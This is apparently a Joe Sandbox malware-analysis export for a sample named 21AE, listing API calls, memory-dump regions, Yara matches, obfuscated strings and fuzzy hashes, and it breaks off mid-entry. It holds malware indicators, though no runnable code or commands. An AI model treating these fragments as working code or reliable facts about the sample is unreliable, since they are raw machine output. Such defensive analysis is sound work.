                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InstalledMemoryPhysicallySystem
                                                            • String ID: sflQ
                                                            • API String ID: 3960555810-3249545781
                                                            APIs
                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InstalledMemoryPhysicallySystem
                                                            • String ID: sflQ
                                                            • API String ID: 3960555810-3249545781
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: \-"#
                                                            • API String ID: 3298025750-2514456039
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3432729115-0
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02140223,?,?), ref: 02140E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02140223,?,?), ref: 02140E1E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            APIs
                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0043738D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007BE49E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                            • String ID: @$A$C$F
                                                            • API String ID: 3829817484-319984173
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                            • API String ID: 0-879020378
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                            • API String ID: 0-4068174152
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                            • API String ID: 0-4068174152
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                            • API String ID: 1279760036-2560538612
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$01$ZR\;$[hct${hmn
                                                            • API String ID: 0-1484469362
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02163FF4
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0216401D
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 02164434
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 02164462
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 02163FF4
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0216401D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID:
                                                            • API String ID: 237503144-0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID: /V.W$2 B$J>;0$gdeb
                                                            • API String ID: 1279760036-1943473526
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #M*O$.A+C$<Y9[$de
                                                            • API String ID: 0-619215113
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2PBb$Yceh$]hW9
                                                            • API String ID: 0-1551782443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: 7452$7452$JlRp
                                                            • API String ID: 2994545307-3284767125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$7452$JlRp
                                                            • API String ID: 0-3284767125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"$R-,T$R-,T
                                                            • API String ID: 0-1082949730
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"$R-,T$R-,T
                                                            • API String ID: 0-1082949730
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$8
                                                            • API String ID: 0-46163386
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0$8
                                                            • API String ID: 0-46163386
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$"
                                                            • API String ID: 0-3758156766
                                                            • Opcode ID: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                            • Instruction ID: 4536deac87be68b66e6b1169164205a16b20366d1629798eb3173c915dafa2c3
                                                            • Opcode Fuzzy Hash: 39a36143f8f53ad1dc47c3b50122958e84c0c18b91b285685412c9f6e20ff32b
                                                            • Instruction Fuzzy Hash: 2502F371B083249BD714CE29E89076BB7D5ABC4314F998A6EE8958B381D738DD048B86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
                                                            • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction ID: 7b452434a6981daf3897cf41d5a8b3d7af6e106c371cdce4e3df3c115ab245c1
                                                            • Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
                                                            • Instruction Fuzzy Hash: D5F16CB0244B818FE3398F29C0A47A7BBE5BF56304F44896DC4EB8B685C779B019CB51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
                                                            • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction ID: 8b2dec866649cd4fd330bcebb006a227b99ea0cb39f79a003b935dfea1acb409
                                                            • Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
                                                            • Instruction Fuzzy Hash: 03F16CB0645B818FE3398F29C0A47A7BBE5BB56304F04896DC4EB8B685C779B019CB51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$IEND
                                                            • API String ID: 0-707183367
                                                            • Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                            • Instruction ID: 7d6f994e86c893c8d5b35c13d59a12a43c5031c3a3cdf510de2e55d81d201c86
                                                            • Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
                                                            • Instruction Fuzzy Hash: B4E1F1B2A483449FD714CF28CC9075EBBE1AF94304F15892DF9999B381DB79E904CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction ID: 2c0b636c8f7a7c10555f0b16b025c9559032f4b9242e28262834d6f33c4e1acb
                                                            • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction Fuzzy Hash: 63D19E70205BA08FE325CF24D0A47A3BBE2BF56304F99495DC4EB8B385CB796449CB59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452$JlRp
                                                            • API String ID: 0-1201309010
                                                            • Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction ID: 093d3bfd411642ac0d49dc15686aa434413e59a475647d27f914d66f0f35c602
                                                            • Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
                                                            • Instruction Fuzzy Hash: 4FD18EB0245B818FE3298F25C0A87B7BBE6BF56308F48895DC4EB4B685C7797019CB51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]hiX$gdeb
                                                            • API String ID: 0-4273025081
                                                            • Opcode ID: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                            • Instruction ID: c2edc6eb81f99fa36f4b369b61a29aa3029008cd3b535e0a58ce780a6f5d4ec0
                                                            • Opcode Fuzzy Hash: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
                                                            • Instruction Fuzzy Hash: 93C1B0B16483418FD314CF18C89476FB7E2FB89318F198A6DE89587380E776D955CB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb$gdeb
                                                            • API String ID: 0-1883251077
                                                            • Opcode ID: 041203bfd2295846363c137b8e628af04ec4977896f6b42554eef81a3ecd3aa8
                                                            • Instruction ID: cf9f2457e42b5478319b54834123ade71b3d153c6120c0fe94c03a58d741c5db
                                                            • Opcode Fuzzy Hash: 041203bfd2295846363c137b8e628af04ec4977896f6b42554eef81a3ecd3aa8
                                                            • Instruction Fuzzy Hash: F1513678200B018FD724CF1AC490B27B7E1BB49319F14AA2DD59B8BB62C738F945DB58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb$gdeb
                                                            • API String ID: 0-1883251077
                                                            • Opcode ID: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                            • Instruction ID: e92ea4fe5443a7465b3ee846efb2000115bf1a6242ab2642b3cbd9abe9ffc45f
                                                            • Opcode Fuzzy Hash: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
                                                            • Instruction Fuzzy Hash: B531E274211B408BD328CF24C5A4727B7F2BF86706F945A1DC4930BF95C778BA469B84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                            • Instruction ID: 55aad70b625533d885964fe9cb24da3c7b8194ed29cb22960a26a8a6f416ebd2
                                                            • Opcode Fuzzy Hash: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
                                                            • Instruction Fuzzy Hash: C722B1716083119FD714CF18C890B2BFBE1BB89318F198A2EE8D597391C779D905CB9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                            • Instruction ID: 87aaa0df15eeba67399ac28775d5075b6facd9278ae1a8c3cf56e04d0c664600
                                                            • Opcode Fuzzy Hash: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
                                                            • Instruction Fuzzy Hash: FF22CEB16487918FD714CF18C890B2BBBF5BBC9318F188A2CE9D49B291C775D905CB92
                                                            Strings
                                                            Memory Dump Source
